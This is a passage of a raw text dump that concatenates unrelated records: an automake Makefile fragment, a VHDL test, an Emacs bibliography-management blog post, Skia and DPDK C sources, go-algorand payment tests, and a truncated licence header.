\\\n\t rm -f \"$(DESTDIR)$(libini_includedir)/$$f\"; \\\n\tdone\n\nID: $(HEADERS) $(SOURCES) $(LISP) $(TAGS_FILES)\n\tlist='$(SOURCES) $(HEADERS) $(LISP) $(TAGS_FILES)'; \\\n\tunique=`for i in $$list; do \\\n\t if test -f \"$$i\"; then echo $$i; else echo $(srcdir)/$$i; fi; \\\n\t done | \\\n\t $(AWK) ' { files[$$0] = 1; } \\\n\t END { for (i in files) print i; }'`; \\\n\tmkid -fID $$unique\ntags: TAGS\n\nTAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \\\n\t\t$(TAGS_FILES) $(LISP)\n\ttags=; \\\n\there=`pwd`; \\\n\tlist='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \\\n\tunique=`for i in $$list; do \\\n\t if test -f \"$$i\"; then echo $$i; else echo $(srcdir)/$$i; fi; \\\n\t done | \\\n\t $(AWK) ' { files[$$0] = 1; } \\\n\t END { for (i in files) print i; }'`; \\\n\tif test -z \"$(ETAGS_ARGS)$$tags$$unique\"; then :; else \\\n\t test -z \"$$unique\" && unique=$$empty_fix; \\\n\t $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \\\n\t $$tags $$unique; \\\n\tfi\nctags: CTAGS\nCTAGS: $(HEADERS) $(SOURCES) config.h.in $(TAGS_DEPENDENCIES) \\\n\t\t$(TAGS_FILES) $(LISP)\n\ttags=; \\\n\there=`pwd`; \\\n\tlist='$(SOURCES) $(HEADERS) config.h.in $(LISP) $(TAGS_FILES)'; \\\n\tunique=`for i in $$list; do \\\n\t if test -f \"$$i\"; then echo $$i; else echo $(srcdir)/$$i; fi; \\\n\t done | \\\n\t $(AWK) ' { files[$$0] = 1; } \\\n\t END { for (i in files) print i; }'`; \\\n\ttest -z \"$(CTAGS_ARGS)$$tags$$unique\" \\\n\t || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \\\n\t $$tags $$unique\n\nGTAGS:\n\there=`$(am__cd) $(top_builddir) && pwd` \\\n\t && cd $(top_srcdir) \\\n\t && gtags -i $(GTAGS_ARGS) $$here\n\ndistclean-tags:\n\t-rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags\n\ndistdir: $(DISTFILES)\n\t@srcdirstrip=`echo \"$(srcdir)\" | sed 's|.|.|g'`; \\\n\ttopsrcdirstrip=`echo \"$(top_srcdir)\" | sed 's|.|.|g'`; \\\n\tlist='$(DISTFILES)'; for file in $$list; do \\\n\t case $$file in \\\n\t $(srcdir)/*) file=`echo \"$$file\" | sed \"s|^$$srcdirstrip/||\"`;; \\\n\t $(top_srcdir)/*) file=`echo \"$$file\" | sed \"s|^$$topsrcdirstrip/|$(top_builddir)/|\"`;; \\\n\t esac; \\\n\t if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \\\n\t dir=`echo \"$$file\" | sed -e 's,/[^/]*$$,,'`; \\\n\t if 
test \"$$dir\" != \"$$file\" && test \"$$dir\" != \".\"; then \\\n\t dir=\"/$$dir\"; \\\n\t $(mkdir_p) \"$(distdir)$$dir\"; \\\n\t else \\\n\t dir=''; \\\n\t fi; \\\n\t if test -d $$d/$$file; then \\\n\t if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \\\n\t cp -pR $(srcdir)/$$file $(distdir)$$dir || exit 1; \\\n\t fi; \\\n\t cp -pR $$d/$$file $(distdir)$$dir || exit 1; \\\n\t else \\\n\t test -f $(distdir)/$$file \\\n\t || cp -p $$d/$$file $(distdir)/$$file \\\n\t || exit 1; \\\n\t fi; \\\n\tdone\ncheck-am: all-am\ncheck: check-am\nall-am: Makefile $(HEADERS) config.h\ninstalldirs:\n\tfor dir in \"$(DESTDIR)$(libini_includedir)\"; do \\\n\t test -z \"$$dir\" || $(mkdir_p) \"$$dir\"; \\\n\tdone\ninstall: install-am\ninstall-exec: install-exec-am\ninstall-data: install-data-am\nuninstall: uninstall-am\n\ninstall-am: all-am\n\t@$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am\n\ninstallcheck: installcheck-am\ninstall-strip:\n\t$(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM=\"$(INSTALL_STRIP_PROGRAM)\" \\\n\t install_sh_PROGRAM=\"$(INSTALL_STRIP_PROGRAM)\" INSTALL_STRIP_FLAG=-s \\\n\t `test -z '$(STRIP)' || \\\n\t echo \"INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'\"` install\nmostlyclean-generic:\n\nclean-generic:\n\ndistclean-generic:\n\t-rm -f $(CONFIG_CLEAN_FILES)\n\nmaintainer-clean-generic:\n\t@echo \"This command is intended for maintainers to use\"\n\t@echo \"it deletes files that may require special tools to rebuild.\"\nclean: clean-am\n\nclean-am: clean-generic clean-libtool mostlyclean-am\n\ndistclean: distclean-am\n\t-rm -f Makefile\ndistclean-am: clean-am distclean-generic distclean-hdr \\\n\tdistclean-libtool distclean-tags\n\ndvi: dvi-am\n\ndvi-am:\n\nhtml: html-am\n\ninfo: info-am\n\ninfo-am:\n\ninstall-data-am: install-libini_includeHEADERS\n\ninstall-exec-am:\n\ninstall-info: install-info-am\n\ninstall-man:\n\ninstallcheck-am:\n\nmaintainer-clean: maintainer-clean-am\n\t-rm -f Makefile\nmaintainer-clean-am: distclean-am maintainer-clean-generic\n\nmostlyclean: mostlyclean-am\n\nmostlyclean-am: mostlyclean-generic mostlyclean-libtool\n\npdf: pdf-am\n\npdf-am:\n\nps: ps-am\n\nps-am:\n\nuninstall-am: uninstall-info-am uninstall-libini_includeHEADERS\n\n.PHONY: CTAGS GTAGS all all-am check check-am clean clean-generic \\\n\tclean-libtool ctags distclean distclean-generic distclean-hdr \\\n\tdistclean-libtool distclean-tags distdir dvi dvi-am html \\\n\thtml-am info info-am install install-am install-data \\\n\tinstall-data-am install-exec install-exec-am install-info \\\n\tinstall-info-am install-libini_includeHEADERS install-man \\\n\tinstall-strip installcheck installcheck-am installdirs \\\n\tmaintainer-clean maintainer-clean-generic mostlyclean \\\n\tmostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \\\n\ttags uninstall uninstall-am uninstall-info-am \\\n\tuninstall-libini_includeHEADERS\n\n# Tell versions [3.59,3.63) of GNU make to not export all variables.\n# Otherwise a system limit (for SysV at least) may be exceeded.\n.NOEXPORT:\n"} {"text": "entity signal9 is\nend entity;\n\nlibrary ieee;\nuse ieee.std_logic_1164.all;\nuse ieee.numeric_std.all;\n\narchitecture test of signal9 is\n signal vec : std_logic_vector(7 downto 0);\nbegin\n\n assign_p: vec <= X\"52\";\n\n count_p: process is\n variable ctr : unsigned(7 downto 0) := X\"00\";\n begin\n wait for 1 ns;\n loop\n ctr := ctr + 1;\n exit when vec = std_logic_vector(ctr);\n end loop;\n loop\n ctr := ctr + 1;\n exit when unsigned(vec) = ctr;\n end loop;\n wait;\n end process;\n\nend architecture;\n"} 
{"text": "\n\n\n\nHow to use Emacs to keep track of your bibliography and notes:\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n

How to use Emacs to keep track of your bibliography and notes:

\n

anatomy of an Emacs hack

April 17th, 2007 - http://sachachua.com/blog/p/4611

Keep your records in BibTeX, which is a text-based tool for keeping track of bibliographies. BibTeX really shines when you use it with TeX or LaTeX because you can cite papers by typing something like “\cite{chua07}”. It will automatically publish your bibliography in any of the popular formats, sorting it however you want and including only the papers you actually referenced. Major paper libraries like the ACM Digital Library can export bibliographic records as BibTeX. You can also use bibtex-mode to help you create records. Assign short, memorable keys to the BibTeX records. I usually use the first author's last name together with the year of publication, with a few more characters if I need to disambiguate.

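For example, a record in your .bib file might look like this (a made-up entry, using the author-plus-year key convention described above):

@inproceedings{chua07,
  author    = {Sacha Chua},
  title     = {An Example Paper Title},
  booktitle = {Proceedings of an Example Workshop},
  year      = {2007}
}
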
You can keep your notes about papers in whatever format you want. Just add a line like “\cite{chua07a}” to make it easier to paste the citation. I put my notes into a fortune file (chunks delimited by % on a line by itself) because whenever I get writer's block, I like retrieving random notes using the fortune command. I usually highlight selections from the PDFs, paste them into my Emacs buffer, and add the \cite… note. I keep exact quotations so that I can paraphrase them any way I want when I write the document. Sometimes I'll add comments, which I visually distinguish from the quote so that I don't get confused. You can also add keywords to your notes and use M-x occur or grep to find matching quotes.

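A chunk in that fortune file might look like this (a hypothetical entry; the quote, comment, and keywords are placeholders):

"Exact sentence copied from the paper goes here."
COMMENT: my own take, kept visually distinct from the quote.
keywords: emacs, bibliography
\cite{chua07a}
%
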
When it's time to work on your paper, keep your citation notes close to the statements as you paraphrase them for your paper. The best way to take advantage of the data you have is to use LaTeX, a powerful typesetting system for scientific papers and books. It's well worth learning and it's the standard in many scientific circles. Even if you use OpenOffice.org or some other word processor, though, you can still take advantage of your notes: just make sure you copy the citations into your bibliography.

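In a LaTeX document, that just means citing by key and pointing at your .bib file. A minimal sketch (the file name research.bib is an assumption):

\documentclass{article}
\begin{document}
As \cite{chua07} argues, exact quotations are easier to paraphrase later.
\bibliographystyle{plain}
\bibliography{research}
\end{document}
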
So that's the basic way to do it. Of course, I've been accumulating various Emacs hacks for managing my bibliography, and they're all in ../emacs/research-config.el.

The first thing I noticed was that I was typing \cite{someid} all the time. Hmm. There must be a way I could just take that information from my BibTeX file… So I wrote a function that allowed me to mark a BibTeX record as the current paper I was reading.

(defvar sacha/research/quote-default ""
  "Stores the BibTeX key for the paper I'm currently reading.")
(defadvice bibtex-clean-entry (after sacha activate)
  "Set default key based on the current record."
  (setq sacha/research/quote-default (bibtex-key-in-head))
  (set-register ?a (format "\n\\cite{%s}\n%%" sacha/research/quote-default))
  (set-register ?b sacha/research/quote-default))

Okay. That meant I could just insert the register with C-x r i a. This wasn't really that much of an improvement, so I thought about making a function that pasted the text, added the citation, and added the % that separates entries in fortune files.

(defvar sacha/research/quote-file "/home/sacha/notebook/research/quotes"
  "File with my research notes.")
(defun sacha/research/quote ()
  "Paste the quote into `sacha/research/quote-file'."
  (interactive)
  (with-current-buffer (find-file-noselect sacha/research/quote-file)
    (goto-char (point-max))
    (yank)
    (unless (bolp) (insert "\n"))
    (insert "\\cite{" sacha/research/quote-default "}\n%\n")))

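If you use this often, you could bind it to a key in your Emacs config (a suggested binding, not from the original post):

(global-set-key (kbd "C-c q") 'sacha/research/quote)
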
I have lots of other functions to keep track of read entries (moving the papers into a separate folder!), count papers read and remaining (good for morale when you see the numbers decreasing, and for a while I was publishing the numbers on my blog!) and even quickly browse and tag quotes. =) You can check out ../emacs/research-config.el for more inspiration.

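A minimal sketch of the "count papers read and remaining" idea, not taken from the original config (the helper names are made up, and the .bib file is whatever you pass in):

(defun my/count-regexp-in-file (file regexp)
  "Return the number of matches for REGEXP in FILE."
  (with-temp-buffer
    (insert-file-contents file)
    (goto-char (point-min))
    (let ((count 0))
      (while (re-search-forward regexp nil t)
        (setq count (1+ count)))
      count)))

(defun my/research-progress (bib-file)
  "Show how many quotes have been collected versus how many entries BIB-FILE holds."
  (interactive "fBibTeX file: ")
  (message "Quoted notes: %d / BibTeX entries: %d"
           (my/count-regexp-in-file sacha/research/quote-file "^%$")
           (my/count-regexp-in-file bib-file "^@")))
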
And yes, this is what I do when I want to procrastinate working on my thesis…

Random Emacs symbol: memory-signal-data – Variable: Precomputed `signal' argument for memory-full error.
\n\n\n\n"} {"text": "\n\n \n \n \n \n \n \n"} {"text": "\n/*\n * Copyright 2006 The Android Open Source Project\n *\n * Use of this source code is governed by a BSD-style license that can be\n * found in the LICENSE file.\n */\n\n\n#ifndef SkApplication_DEFINED\n#define SkApplication_DEFINED\n\nclass SkOSWindow;\n\nextern SkOSWindow* create_sk_window(void* hwnd, int argc, char** argv);\nextern void application_init();\nextern void application_term();\n\n#ifdef SK_BUILD_FOR_IOS\nenum IOS_launch_type {\n kError_iOSLaunchType = -1,\n kTool_iOSLaunchType = 0,\n kApplication__iOSLaunchType = 1\n};\n\nextern IOS_launch_type set_cmd_line_args(int argc, char *argv[],\n const char* resourceDir);\n#endif\n\n#endif // SkApplication_DEFINED\n"} {"text": "/*-\n * BSD LICENSE\n *\n * Copyright(c) 2010-2014 Intel Corporation. All rights reserved.\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in\n * the documentation and/or other materials provided with the\n * distribution.\n * * Neither the name of Intel Corporation nor the names of its\n * contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n#include \"acl_run_sse.h\"\n\nint\nrte_acl_classify_sse(const struct rte_acl_ctx *ctx, const uint8_t **data,\n\tuint32_t *results, uint32_t num, uint32_t categories)\n{\n\tif (likely(num >= MAX_SEARCHES_SSE8))\n\t\treturn search_sse_8(ctx, data, results, num, categories);\n\telse if (num >= MAX_SEARCHES_SSE4)\n\t\treturn search_sse_4(ctx, data, results, num, categories);\n\telse\n\t\treturn rte_acl_classify_scalar(ctx, data, results, num,\n\t\t\tcategories);\n}\n"} {"text": "// Copyright (C) 2019-2020 Algorand, Inc.\n// This file is part of go-algorand\n//\n// go-algorand is free software: you can redistribute it and/or modify\n// it under the terms of the GNU Affero General Public License as\n// published by the Free Software Foundation, either version 3 of the\n// License, or (at your option) any later version.\n//\n// go-algorand is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n// GNU Affero General Public License for more details.\n//\n// You should have received a copy of the GNU Affero General Public License\n// along with go-algorand. If not, see .\n\npackage apply\n\nimport (\n\t\"math/rand\"\n\t\"testing\"\n\n\t\"github.com/stretchr/testify/require\"\n\n\t\"github.com/algorand/go-algorand/config\"\n\t\"github.com/algorand/go-algorand/crypto\"\n\t\"github.com/algorand/go-algorand/data/basics\"\n\t\"github.com/algorand/go-algorand/data/transactions\"\n\t\"github.com/algorand/go-algorand/protocol\"\n)\n\nvar poolAddr = basics.Address{0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff}\n\nvar spec = transactions.SpecialAddresses{\n\tFeeSink: feeSink,\n\tRewardsPool: poolAddr,\n}\n\nfunc keypair() *crypto.SignatureSecrets {\n\tvar seed crypto.Seed\n\tcrypto.RandBytes(seed[:])\n\ts := crypto.GenerateSignatureSecrets(seed)\n\treturn s\n}\n\nfunc TestAlgosEncoding(t *testing.T) {\n\tvar a basics.MicroAlgos\n\tvar b basics.MicroAlgos\n\tvar i uint64\n\n\ta.Raw = 222233333\n\terr := protocol.Decode(protocol.Encode(&a), &b)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\trequire.Equal(t, a, b)\n\n\ta.Raw = 12345678\n\terr = protocol.DecodeReflect(protocol.Encode(a), &i)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\trequire.Equal(t, a.Raw, i)\n\n\ti = 87654321\n\terr = protocol.Decode(protocol.EncodeReflect(i), &a)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\trequire.Equal(t, a.Raw, i)\n\n\tx := true\n\terr = protocol.Decode(protocol.EncodeReflect(x), &a)\n\tif err == nil {\n\t\tpanic(\"decode of bool into MicroAlgos succeeded\")\n\t}\n}\n\ntype mockBalances struct {\n\tprotocol.ConsensusVersion\n}\n\nfunc (balances mockBalances) Round() basics.Round {\n\treturn basics.Round(8675309)\n}\n\nfunc (balances mockBalances) PutWithCreatable(basics.BalanceRecord, *basics.CreatableLocator, *basics.CreatableLocator) error {\n\treturn nil\n}\n\nfunc (balances mockBalances) Get(basics.Address, bool) (basics.BalanceRecord, error) {\n\treturn basics.BalanceRecord{}, nil\n}\n\nfunc (balances mockBalances) GetCreator(idx basics.CreatableIndex, ctype basics.CreatableType) (basics.Address, bool, error) {\n\treturn basics.Address{}, true, nil\n}\n\nfunc (balances mockBalances) Put(basics.BalanceRecord) error {\n\treturn nil\n}\n\nfunc (balances mockBalances) Move(src, dst basics.Address, amount basics.MicroAlgos, srcRewards, dstRewards *basics.MicroAlgos) error {\n\treturn nil\n}\n\nfunc (balances mockBalances) ConsensusParams() config.ConsensusParams {\n\treturn config.Consensus[balances.ConsensusVersion]\n}\n\nfunc TestPaymentApply(t *testing.T) {\n\tmockBalV0 := mockBalances{protocol.ConsensusCurrentVersion}\n\n\tsecretSrc := keypair()\n\tsrc := basics.Address(secretSrc.SignatureVerifier)\n\n\tsecretDst := keypair()\n\tdst := basics.Address(secretDst.SignatureVerifier)\n\n\ttx := transactions.Transaction{\n\t\tType: protocol.PaymentTx,\n\t\tHeader: transactions.Header{\n\t\t\tSender: src,\n\t\t\tFee: basics.MicroAlgos{Raw: 1},\n\t\t\tFirstValid: basics.Round(100),\n\t\t\tLastValid: basics.Round(1000),\n\t\t},\n\t\tPaymentTxnFields: transactions.PaymentTxnFields{\n\t\t\tReceiver: dst,\n\t\t\tAmount: basics.MicroAlgos{Raw: uint64(50)},\n\t\t},\n\t}\n\tvar ad transactions.ApplyData\n\terr := Payment(tx.PaymentTxnFields, tx.Header, mockBalV0, transactions.SpecialAddresses{FeeSink: feeSink}, &ad)\n\trequire.NoError(t, err)\n}\n\nfunc TestCheckSpender(t 
*testing.T) {\n\tmockBalV0 := mockBalances{protocol.ConsensusCurrentVersion}\n\tmockBalV7 := mockBalances{protocol.ConsensusV7}\n\n\tsecretSrc := keypair()\n\tsrc := basics.Address(secretSrc.SignatureVerifier)\n\n\tsecretDst := keypair()\n\tdst := basics.Address(secretDst.SignatureVerifier)\n\n\ttx := transactions.Transaction{\n\t\tType: protocol.PaymentTx,\n\t\tHeader: transactions.Header{\n\t\t\tSender: src,\n\t\t\tFee: basics.MicroAlgos{Raw: 1},\n\t\t\tFirstValid: basics.Round(100),\n\t\t\tLastValid: basics.Round(1000),\n\t\t},\n\t\tPaymentTxnFields: transactions.PaymentTxnFields{\n\t\t\tReceiver: dst,\n\t\t\tAmount: basics.MicroAlgos{Raw: uint64(50)},\n\t\t},\n\t}\n\n\ttx.Sender = basics.Address(feeSink)\n\trequire.Error(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV0.ConsensusParams()))\n\n\tpoolAddr := basics.Address(poolAddr)\n\ttx.Receiver = poolAddr\n\trequire.NoError(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV0.ConsensusParams()))\n\n\ttx.CloseRemainderTo = poolAddr\n\trequire.Error(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV0.ConsensusParams()))\n\trequire.Error(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV7.ConsensusParams()))\n\n\ttx.Sender = src\n\trequire.NoError(t, checkSpender(tx.PaymentTxnFields, tx.Header, spec, mockBalV7.ConsensusParams()))\n}\n\nfunc TestPaymentValidation(t *testing.T) {\n\tpayments, _, _, _ := generateTestObjects(100, 50)\n\tgenHash := crypto.Digest{0x42}\n\tfor i, txn := range payments {\n\t\ttxn.GenesisHash = genHash\n\t\tpayments[i] = txn\n\t}\n\ttc := transactions.ExplicitTxnContext{\n\t\tProto: config.Consensus[protocol.ConsensusCurrentVersion],\n\t\tGenHash: genHash,\n\t}\n\tfor _, txn := range payments {\n\t\t// Lifetime window\n\t\ttc.ExplicitRound = txn.First() + 1\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive during lifetime %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.First()\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive at issuance %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.Last()\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive at expiry %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.First() - 1\n\t\tif txn.Alive(tc) == nil {\n\t\t\tt.Errorf(\"premature transaction alive %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.Last() + 1\n\t\tif txn.Alive(tc) == nil {\n\t\t\tt.Errorf(\"expired transaction alive %v\", txn)\n\t\t}\n\n\t\t// Make a copy of txn, change some fields, be sure the TXID changes. 
This is not exhaustive.\n\t\tvar txn2 transactions.Transaction\n\t\ttxn2 = txn\n\t\ttxn2.Note = []byte{42}\n\t\tif txn2.ID() == txn.ID() {\n\t\t\tt.Errorf(\"txid does not depend on note\")\n\t\t}\n\t\ttxn2 = txn\n\t\ttxn2.Amount.Raw++\n\t\tif txn2.ID() == txn.ID() {\n\t\t\tt.Errorf(\"txid does not depend on amount\")\n\t\t}\n\t\ttxn2 = txn\n\t\ttxn2.Fee.Raw++\n\t\tif txn2.ID() == txn.ID() {\n\t\t\tt.Errorf(\"txid does not depend on fee\")\n\t\t}\n\t\ttxn2 = txn\n\t\ttxn2.LastValid++\n\t\tif txn2.ID() == txn.ID() {\n\t\t\tt.Errorf(\"txid does not depend on lastvalid\")\n\t\t}\n\n\t\t// Check malformed transactions\n\t\tlargeWindow := txn\n\t\tlargeWindow.LastValid += basics.Round(tc.Proto.MaxTxnLife)\n\t\tif largeWindow.WellFormed(spec, tc.Proto) == nil {\n\t\t\tt.Errorf(\"transaction with large window %#v verified incorrectly\", largeWindow)\n\t\t}\n\n\t\tbadWindow := txn\n\t\tbadWindow.LastValid = badWindow.FirstValid - 1\n\t\tif badWindow.WellFormed(spec, tc.Proto) == nil {\n\t\t\tt.Errorf(\"transaction with bad window %#v verified incorrectly\", badWindow)\n\t\t}\n\n\t\tbadFee := txn\n\t\tbadFee.Fee = basics.MicroAlgos{}\n\t\tif badFee.WellFormed(spec, tc.Proto) == nil {\n\t\t\tt.Errorf(\"transaction with no fee %#v verified incorrectly\", badFee)\n\t\t}\n\t}\n}\n\nfunc TestPaymentSelfClose(t *testing.T) {\n\tsecretSrc := keypair()\n\tsrc := basics.Address(secretSrc.SignatureVerifier)\n\n\tsecretDst := keypair()\n\tdst := basics.Address(secretDst.SignatureVerifier)\n\n\ttx := transactions.Transaction{\n\t\tType: protocol.PaymentTx,\n\t\tHeader: transactions.Header{\n\t\t\tSender: src,\n\t\t\tFee: basics.MicroAlgos{Raw: config.Consensus[protocol.ConsensusCurrentVersion].MinTxnFee},\n\t\t\tFirstValid: basics.Round(100),\n\t\t\tLastValid: basics.Round(1000),\n\t\t},\n\t\tPaymentTxnFields: transactions.PaymentTxnFields{\n\t\t\tReceiver: dst,\n\t\t\tAmount: basics.MicroAlgos{Raw: uint64(50)},\n\t\t\tCloseRemainderTo: src,\n\t\t},\n\t}\n\trequire.Error(t, tx.WellFormed(spec, config.Consensus[protocol.ConsensusCurrentVersion]))\n}\n\nfunc generateTestObjects(numTxs, numAccs int) ([]transactions.Transaction, []transactions.SignedTxn, []*crypto.SignatureSecrets, []basics.Address) {\n\ttxs := make([]transactions.Transaction, numTxs)\n\tsigned := make([]transactions.SignedTxn, numTxs)\n\tsecrets := make([]*crypto.SignatureSecrets, numAccs)\n\taddresses := make([]basics.Address, numAccs)\n\n\tfor i := 0; i < numAccs; i++ {\n\t\tsecret := keypair()\n\t\taddr := basics.Address(secret.SignatureVerifier)\n\t\tsecrets[i] = secret\n\t\taddresses[i] = addr\n\t}\n\n\tfor i := 0; i < numTxs; i++ {\n\t\ts := rand.Intn(numAccs)\n\t\tr := rand.Intn(numAccs)\n\t\ta := rand.Intn(1000)\n\t\tf := config.Consensus[protocol.ConsensusCurrentVersion].MinTxnFee + uint64(rand.Intn(10))\n\t\tiss := 50 + rand.Intn(30)\n\t\texp := iss + 10\n\n\t\ttxs[i] = transactions.Transaction{\n\t\t\tType: protocol.PaymentTx,\n\t\t\tHeader: transactions.Header{\n\t\t\t\tSender: addresses[s],\n\t\t\t\tFee: basics.MicroAlgos{Raw: f},\n\t\t\t\tFirstValid: basics.Round(iss),\n\t\t\t\tLastValid: basics.Round(exp),\n\t\t\t},\n\t\t\tPaymentTxnFields: transactions.PaymentTxnFields{\n\t\t\t\tReceiver: addresses[r],\n\t\t\t\tAmount: basics.MicroAlgos{Raw: uint64(a)},\n\t\t\t},\n\t\t}\n\t\tsigned[i] = txs[i].Sign(secrets[s])\n\t}\n\n\treturn txs, signed, secrets, addresses\n}\n\n/*\nfunc TestTxnValidation(t *testing.T) {\n\t_, signed, _, _ := generateTestObjects(100, 50)\n\ttc := ExplicitTxnContext{\n\t\tProto: 
config.Consensus[protocol.ConsensusCurrentVersion],\n\t}\n\n\tfor i, stxn := range signed {\n\t\tif stxn.Verify() != nil {\n\t\t\tt.Errorf(\"signed transaction %#v did not verify\", stxn)\n\t\t}\n\t\ttxn := stxn.Transaction.(Payment)\n\n\t\ttc.ExplicitRound = txn.First()+1\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive during lifetime %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.First()\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive at issuance %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.Last()\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"transaction not alive at expiry %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.First()-1\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"premature transaction alive %v\", txn)\n\t\t}\n\n\t\ttc.ExplicitRound = txn.Last()+1\n\t\tif txn.Alive(tc) != nil {\n\t\t\tt.Errorf(\"expired transaction alive %v\", txn)\n\t\t}\n\n\t\tbadSig := stxn\n\t\totherTransaction := txn\n\t\totherTransaction.Note = []byte{42}\n\t\tbadSig.Transaction = &otherTransaction\n\t\tbadSig.InitCaches()\n\t\tif badSig.Verify() == nil {\n\t\t\tt.Errorf(\"modified transaction %#v verified incorrectly\", badSig)\n\t\t}\n\n\t\tnoSig := stxn\n\t\tnoSig.Sig = crypto.Signature{}\n\t\tif noSig.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with no signature %#v verified incorrectly\", noSig)\n\t\t}\n\n\t\tlargeWindow := stxn\n\t\tlargeWindow.LastValid += basics.Round(config.Protocol.MaxTxnLife)\n\t\tif largeWindow.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with large window %#v verified incorrectly\", largeWindow)\n\t\t}\n\n\t\tbadWindow := txn\n\t\tbadWindow.Payment.LastValid = badWindow.Payment.FirstValid - 1\n\t\tif badWindow.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with bad window %#v verified incorrectly\", badWindow)\n\t\t}\n\n\t\tbadFee := txn\n\t\tbadFee.Payment.Fee = basics.MicroAlgos{}\n\t\tif badFee.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with small fee %#v verified incorrectly\", badFee)\n\t\t}\n\n\t\toverflow := txn\n\t\toverflow.Payment.Amount = basics.MicroAlgos{}\n\t\toverflow.Payment.Fee = basics.MicroAlgos{Raw: 10}\n\t\tif overflow.Verify() == nil {\n\t\t\tt.Errorf(\"transaction with overflowing amount %#v verified incorrectly\", overflow)\n\t\t}\n\n\t\tif i > 5 {\n\t\t\tbreak\n\t\t}\n\t}\n}\n*/\n"} {"text": "/*\r\n** p_terrain.h\r\n**\r\n**---------------------------------------------------------------------------\r\n** Copyright 1998-2006 Randy Heit\r\n** All rights reserved.\r\n**\r\n** Redistribution and use in source and binary forms, with or without\r\n** modification, are permitted provided that the following conditions\r\n** are met:\r\n**\r\n** 1. Redistributions of source code must retain the above copyright\r\n** notice, this list of conditions and the following disclaimer.\r\n** 2. Redistributions in binary form must reproduce the above copyright\r\n** notice, this list of conditions and the following disclaimer in the\r\n** documentation and/or other materials provided with the distribution.\r\n** 3. 
